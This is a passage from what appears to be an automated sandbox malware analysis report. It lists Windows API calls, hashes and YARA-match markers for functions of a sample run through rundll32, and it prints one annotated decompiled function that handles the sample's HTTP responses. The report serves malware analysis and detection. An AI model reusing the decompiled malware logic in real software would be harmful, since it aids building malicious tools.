                                                          • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 062849CA
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 062849EB
                                                          • DeleteFileA.KERNEL32(?,00003219), ref: 06284A0D
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06284A1C
                                                          • HeapFree.KERNEL32(00000000,?,00003219), ref: 06284A34
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 1078934163-0
                                                          • Opcode ID: 183f305c0e95e3bd4a4dd9681b8b04e1ee67edcb6af3785fe41ad831032adbb0
                                                          • Instruction ID: f469eb8ccc86e07062429850484dded19c7f68fde2825efe910b4de4c6e47f6c
                                                          • Opcode Fuzzy Hash: 183f305c0e95e3bd4a4dd9681b8b04e1ee67edcb6af3785fe41ad831032adbb0
                                                          • Instruction Fuzzy Hash: 2B319C32611306AFE751FB54ED08F6A77E9AF89744F040419FB44AB180D765E905CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,06278478,00000000), ref: 0627E02B
                                                          • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 0627E040
                                                          • memset.NTDLL ref: 0627E04D
                                                          • HeapFree.KERNEL32(00000000,00000000,?,06278477,?,?,00000000,?,00000000,06289CD0,?,00000000), ref: 0627E06A
                                                          • memcpy.NTDLL(?,?,06278477,?,06278477,?,?,00000000,?,00000000,06289CD0,?,00000000), ref: 0627E08B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Allocate$Freememcpymemset
                                                          • String ID: chun
                                                          • API String ID: 2362494589-3058818181
                                                          • Opcode ID: 1b2ed6971e8d67300a4f3dd50ad7010d325a73d4e922e75e5b81cca5b9e594dc
                                                          • Instruction ID: bc8416ddf941ce21f781922a18d48c6ffde4f1ee3973ad3ce3a5abecc2c74f7f
                                                          • Opcode Fuzzy Hash: 1b2ed6971e8d67300a4f3dd50ad7010d325a73d4e922e75e5b81cca5b9e594dc
                                                          • Instruction Fuzzy Hash: EA319C71610706AFD7709F65DC45E16B7E9EF84210B058469ED99DB220D770E904CBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			long E036D4A85(void* __ecx, void* __esi) {
                                                          				long _v8;    /* buffer length passed to HttpQueryInfoA */
                                                          				long _v12;   /* result (0 or a Win32/WinINet error code) returned to the caller */
                                                          				long _v16;   /* header index, always 0 here */
                                                          				long _v20;   /* WaitForSingleObject result */
                                                          				long _t34;
                                                          				long _t39;
                                                          				long _t42;
                                                          				long _t56;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t61;
                                                          
                                                          				/* request context: +0x18 hRequest, +0x1c event handle, +0x28 stored error,
                                                          				   +0x2c numeric HTTP status code, +0xc raw response header buffer */
                                                          				_t61 = __esi;
                                                          				_t59 = __ecx;
                                                          				 *((intOrPtr*)(__esi + 0x2c)) = 0;   /* clear the stored status code */
                                                          				do {
                                                          					/* poll the completion event without blocking (timeout 0) */
                                                          					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                          					_v20 = _t34;
                                                          					if(_t34 != 0) {
                                                          						L3:
                                                          						_v8 = 4;
                                                          						_v16 = 0;
                                                          						/* 0x20000013 = HTTP_QUERY_FLAG_NUMBER | HTTP_QUERY_STATUS_CODE: read the status code into +0x2c */
                                                          						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                                                          							_t39 = GetLastError();
                                                          							_v12 = _t39;
                                                          							/* 0x2ef3 = ERROR_INTERNET_INCORRECT_HANDLE_STATE: response not available yet, keep waiting (L11) */
                                                          							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                          								L15:
                                                          								return _v12;
                                                          							} else {
                                                          								goto L11;
                                                          							}
                                                          						}
                                                          						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                                                          							goto L11;
                                                          						} else {
                                                          							_v16 = 0;
                                                          							_v8 = 0;
                                                          							/* 0x16 = HTTP_QUERY_RAW_HEADERS_CRLF: the first call sizes the buffer, the second fills it */
                                                          							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                                                          							_t58 = E036D6D63(_v8 + 1);   /* heap allocation helper (inferred from its use; not in the subcall list) */
                                                          							if(_t58 == 0) {
                                                          								_v12 = 8;   /* ERROR_NOT_ENOUGH_MEMORY */
                                                          							} else {
                                                          								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                                                          									E036D6C2C(_t58);   /* heap free helper (RtlFreeHeap, see subcall list) */
                                                          									_v12 = GetLastError();
                                                          								} else {
                                                          									 *((char*)(_t58 + _v8)) = 0;   /* NUL-terminate the raw header block */
                                                          									 *(_t61 + 0xc) = _t58;
                                                          								}
                                                          							}
                                                          							goto L15;
                                                          						}
                                                          					}
                                                          					/* event was signalled: re-set it for other waiters, then return any error stored at +0x28 */
                                                          					SetEvent( *(_t61 + 0x1c));
                                                          					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                          					_v12 = _t56;
                                                          					if(_t56 != 0) {
                                                          						goto L15;
                                                          					}
                                                          					goto L3;
                                                          					L11:
                                                          					/* wait up to 0xea60 = 60000 ms (WaitForMultipleObjects in the subcall) before polling again */
                                                          					_t42 = E036D6E40( *(_t61 + 0x1c), _t59, 0xea60);
                                                          					_v12 = _t42;
                                                          				} while (_t42 == 0);
                                                          				goto L15;
                                                          			}

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,76CC81D0,00000000,00000000), ref: 036D4A9C
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,036D593D,00000000,?), ref: 036D4AAC
                                                          • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 036D4ADE
                                                          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 036D4B03
                                                          • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 036D4B23
                                                          • GetLastError.KERNEL32 ref: 036D4B35
                                                            • Part of subcall function 036D6E40: WaitForMultipleObjects.KERNEL32(00000002,036D7BB5,00000000,036D7BB5,?,?,?,036D7BB5,0000EA60), ref: 036D6E5B
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          • GetLastError.KERNEL32(00000000), ref: 036D4B6A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 3369646462-0
                                                          • Opcode ID: de89933a5f45582c63b4f578cde8a1032e10297df9082a923d9db4a511e818c9
                                                          • Instruction ID: 13028b2bafd34cf7f1806a5f2982d840758f2aaa67facc0246d036d7cc194633
                                                          • Opcode Fuzzy Hash: de89933a5f45582c63b4f578cde8a1032e10297df9082a923d9db4a511e818c9
                                                          • Instruction Fuzzy Hash: E1313EB5D00308FFDB21DFE5D984AAEBBB8EB18300F1449ADD502E2244DB71AA44CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                          • lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 06278ED3
                                                            • Part of subcall function 0627A5E7: lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,06278EF7,?,00000000,000000FF), ref: 0627A5F8
                                                            • Part of subcall function 0627A5E7: lstrlen.KERNEL32(?,?,?,?,06278EF7,?,00000000,000000FF), ref: 0627A5FF
                                                            • Part of subcall function 0627A5E7: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0627A611
                                                            • Part of subcall function 0627A5E7: _snprintf.NTDLL ref: 0627A637
                                                            • Part of subcall function 0627A5E7: _snprintf.NTDLL ref: 0627A66B
                                                            • Part of subcall function 0627A5E7: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 0627A688
                                                          • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,?,00000000,000000FF), ref: 06278F6D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,000000FF), ref: 06278F8A
                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,000000FF), ref: 06278F92
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF), ref: 06278FA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                                                          • String ID: s:
                                                          • API String ID: 2960378068-2363032815
                                                          • Opcode ID: c6667fbb1f3a4eea853b549a9210502ee6ea121a7862ca784334b791535a7caf
                                                          • Instruction ID: db6d5798fb8e2d4a5f1dc15435d7a6af2bd032eb1c5832614cd8abe0fcec0aad
                                                          • Opcode Fuzzy Hash: c6667fbb1f3a4eea853b549a9210502ee6ea121a7862ca784334b791535a7caf
                                                          • Instruction Fuzzy Hash: 7D317F72A10206BFDB519BE9DC88FDEBBFDAF48315F000464EA15E2141E774A6048B71
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 062713F6
                                                          • lstrcmpiW.KERNEL32(00000000,?), ref: 0627142E
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 06271443
                                                          • lstrlenW.KERNEL32(?), ref: 0627144A
                                                          • CloseHandle.KERNEL32(?), ref: 06271472
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 0627149E
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 062714BC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                                                          • String ID:
                                                          • API String ID: 1496873005-0
                                                          • Opcode ID: 5491138575f9f7e61b7b96811be9a590cdd9488d0c34caeddf28a6fabc876700
                                                          • Instruction ID: d70c550b7e617283594556cb6c7a2efb1b1932c30b0bea89143c64b17dfcec09
                                                          • Opcode Fuzzy Hash: 5491138575f9f7e61b7b96811be9a590cdd9488d0c34caeddf28a6fabc876700
                                                          • Instruction Fuzzy Hash: 4E217171A20306AFDB519F75EC9CE5A77BDAF48648B084125AE01E2140DB30D915EB74
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlen.KERNEL32(0627F67C,00000000,0629A420,0629A440,?,?,0627F67C,0628E453,0629A420), ref: 0627F802
                                                          • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0627F818
                                                          • lstrlen.KERNEL32(0628E453,?,?,0627F67C,0628E453,0629A420), ref: 0627F820
                                                          • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0627F82C
                                                          • lstrcpy.KERNEL32(0629A420,0627F67C), ref: 0627F842
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,0627F67C,0628E453,0629A420), ref: 0627F896
                                                          • HeapFree.KERNEL32(00000000,0629A420,?,?,0627F67C,0628E453,0629A420), ref: 0627F8A5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrlen$lstrcpy
                                                          • String ID:
                                                          • API String ID: 1531811622-0
                                                          • Opcode ID: d12f3d68bda43b5f6ef4e102157bab1030a9557fe8a7b091ecfbd60de9e2f218
                                                          • Instruction ID: f92969dadf28ec352599921a6cb1a7b987a4f7abe73fc697f3adf332df9dccdd
                                                          • Opcode Fuzzy Hash: d12f3d68bda43b5f6ef4e102157bab1030a9557fe8a7b091ecfbd60de9e2f218
                                                          • Instruction Fuzzy Hash: 3B21D731504345AFEB124F69EC49F6A7FA7EF8A394F144058ED4897251C7319C45DBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,06280E77,00000000), ref: 062913DA
                                                            • Part of subcall function 06283193: lstrcpy.KERNEL32(-000000FC,00000000), ref: 062831CD
                                                            • Part of subcall function 06283193: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,062913E7,?,?,00000000,?,06280E77,00000000), ref: 062831DF
                                                            • Part of subcall function 06283193: GetTickCount.KERNEL32 ref: 062831EA
                                                            • Part of subcall function 06283193: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,062913E7,?,?,00000000,?,06280E77,00000000), ref: 062831F6
                                                            • Part of subcall function 06283193: lstrcpy.KERNEL32(00000000), ref: 06283210
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • lstrcpy.KERNEL32(00000000), ref: 06291415
                                                          • wsprintfA.USER32 ref: 06291428
                                                          • GetTickCount.KERNEL32 ref: 0629143D
                                                          • wsprintfA.USER32 ref: 06291452
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                                                          • String ID: "%S"
                                                          • API String ID: 1152860224-1359967185
                                                          • Opcode ID: f2f465d0e0856c276b643d22328e695ddfe7fee6ce50820774b3c8fa523f7ce7
                                                          • Instruction ID: e28d4f5784871603004a10e57aa2cb8e7d983e482541e32ec82fa8dc8e0302dc
                                                          • Opcode Fuzzy Hash: f2f465d0e0856c276b643d22328e695ddfe7fee6ce50820774b3c8fa523f7ce7
                                                          • Instruction Fuzzy Hash: E111D072A113167FD780BBA5AC4CE6F779CDFC9664B054428FE58A7241DA389800CFB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,0627314A,00000000), ref: 062797BD
                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,0627314A,00000000,00000000,00000004,?,00000000,?), ref: 06279830
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                                                          • String ID:
                                                          • API String ID: 2078930461-0
                                                          • Opcode ID: c80eb6bb0fe039c1accb0f1b41ee07d3dc5a24a36f99c58d83eea8d6e650f756
                                                          • Instruction ID: 01014a0652bed9b416474383d5ec047774042dff1eaa49bf06fedbda8855498d
                                                          • Opcode Fuzzy Hash: c80eb6bb0fe039c1accb0f1b41ee07d3dc5a24a36f99c58d83eea8d6e650f756
                                                          • Instruction Fuzzy Hash: 5111C131A51325BFD7722A21BC4DF6F3F9EEB897A5F000121FB45A5190D6724898CAF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 0628358E: lstrlen.KERNEL32(00000000,00000000,76CC81D0,773BEEF0,?,?,?,0628EA2E,?,76C85520,773BEEF0,?,00000000,0627E842,00000000,0689C310), ref: 062835F5
                                                            • Part of subcall function 0628358E: sprintf.NTDLL ref: 06283616
                                                          • lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,0627E842,00000000,0689C310), ref: 0628EA40
                                                          • lstrlen.KERNEL32(?,?,00000000,0627E842,00000000,0689C310), ref: 0628EA48
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • strcpy.NTDLL ref: 0628EA5F
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0628EA6A
                                                            • Part of subcall function 0628C32E: lstrlen.KERNEL32(?,?,?,00000000,?,0628EA79,00000000,?,?,00000000,0627E842,00000000,0689C310), ref: 0628C33F
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,0627E842,00000000,0689C310), ref: 0628EA87
                                                            • Part of subcall function 0627930C: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,0628EA93,00000000,?,00000000,0627E842,00000000,0689C310), ref: 06279316
                                                            • Part of subcall function 0627930C: _snprintf.NTDLL ref: 06279374
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 505cb68394faffbf8adde110fe3b6998fc5b1157634ccb8303186d6ec93368ca
                                                          • Instruction ID: 4348a97e65846da34b81128d0b220af652d1d6f9083a8cf2a79f48fdeae315ef
                                                          • Opcode Fuzzy Hash: 505cb68394faffbf8adde110fe3b6998fc5b1157634ccb8303186d6ec93368ca
                                                          • Instruction Fuzzy Hash: BF117333E226257F4B92BBA9AC88CAE37AD9FC99643060115FD14A7180DE74C902D7F1
Uniqueness Score: -1.00%

APIs
• SwitchToThread.KERNEL32(?,?,0628E846), ref: 06279EAD
• CloseHandle.KERNEL32(?,?,0628E846), ref: 06279EB9
• CloseHandle.KERNEL32(00000000,76CDF720,?,06273576,00000000,?,?,?,0628E846), ref: 06279ECB
• memset.NTDLL ref: 06279EE2
• memset.NTDLL ref: 06279EF9
• memset.NTDLL ref: 06279F10
• memset.NTDLL ref: 06279F27
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Similarity
• API ID: memset$CloseHandle$SwitchThread
• String ID:
• API String ID: 3699883640-0
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?), ref: 0627CAAB
• wcstombs.NTDLL ref: 0627CABC
  • Part of subcall function 06274963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,062770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 06274975
  • Part of subcall function 06274963: StrChrA.SHLWAPI(?,00000020,?,00000000,062770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 06274984
• OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 0627CADD
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0627CAEC
• CloseHandle.KERNEL32(00000000), ref: 0627CAF3
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0627CB02
• WaitForSingleObject.KERNEL32(00000000), ref: 0627CB12
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Similarity
• API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
• String ID:
• API String ID: 417118235-0
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
  • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
  • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
  • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
  • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
  • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
• lstrcpy.KERNEL32(-000000FC,00000000), ref: 062831CD
• CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,062913E7,?,?,00000000,?,06280E77,00000000), ref: 062831DF
• GetTickCount.KERNEL32 ref: 062831EA
• GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,062913E7,?,?,00000000,?,06280E77,00000000), ref: 062831F6
• lstrcpy.KERNEL32(00000000), ref: 06283210
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Similarity
• API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
• String ID: \Low
• API String ID: 1629304206-4112222293
Uniqueness Score: -1.00%

APIs
• wsprintfA.USER32 ref: 06276F64
• CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 06276F76
• SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 06276FA0
• WaitForMultipleObjects.KERNEL32(00000002,06282EB3,00000000,000000FF), ref: 06276FB3
• CloseHandle.KERNEL32(06282EB3), ref: 06276FBC
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Similarity
• API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
• String ID: 0x%08X
• API String ID: 603522830-3182613153
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
• GetLastError.KERNEL32(?,?,?,00001000,?,0629A2F4,76CDF750), ref: 0628D38B
• WaitForSingleObject.KERNEL32(00000000,00000000,?,0629A2F4,76CDF750), ref: 0628D410
• CloseHandle.KERNEL32(00000000,?,0629A2F4,76CDF750), ref: 0628D42A
• OpenProcess.KERNEL32(00100000,00000000,00000000,?,0629A2F4,76CDF750), ref: 0628D45F
  • Part of subcall function 0627D6B0: RtlReAllocateHeap.NTDLL(00000000,?,?,06275546), ref: 0627D6C0
• WaitForSingleObject.KERNEL32(?,00000064,?,0629A2F4,76CDF750), ref: 0628D4E1
• CloseHandle.KERNEL32(F0FFC983,?,0629A2F4,76CDF750), ref: 0628D508
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Similarity
• API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
• String ID:
• API String ID: 3115907006-0
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
• FileTimeToLocalFileTime.KERNEL32(00000000,06282702), ref: 0628B2DA
• FileTimeToSystemTime.KERNEL32(06282702,?), ref: 0628B2E8
• lstrlenW.KERNEL32(00000010), ref: 0628B2F8
• lstrlenW.KERNEL32(00000218), ref: 0628B304
• FileTimeToLocalFileTime.KERNEL32(00000008,06282702), ref: 0628B3F1
• FileTimeToSystemTime.KERNEL32(06282702,?), ref: 0628B3FF
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Similarity
• API ID: Time$File$LocalSystemlstrlen$AllocateHeap
• String ID:
• API String ID: 1122361434-0
Uniqueness Score: -1.00%

APIs
• RtlImageNtHeader.NTDLL(?), ref: 0627E428
  • Part of subcall function 06287A3E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0627E448,?), ref: 06287A6A
  • Part of subcall function 06287A3E: RtlAllocateHeap.NTDLL(00000000,?), ref: 06287A7C
  • Part of subcall function 06287A3E: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0627E448,?), ref: 06287A99
  • Part of subcall function 06287A3E: lstrlenW.KERNEL32(00000000,?,?,0627E448,?), ref: 06287AA5
  • Part of subcall function 06287A3E: HeapFree.KERNEL32(00000000,00000000,?,?,0627E448,?), ref: 06287AB9
• RtlEnterCriticalSection.NTDLL(00000000), ref: 0627E460
• CloseHandle.KERNEL32(?), ref: 0627E46E
• HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 0627E547
• RtlLeaveCriticalSection.NTDLL(00000000), ref: 0627E556
• HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 0627E569
Memory Dump Source
• Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
Similarity
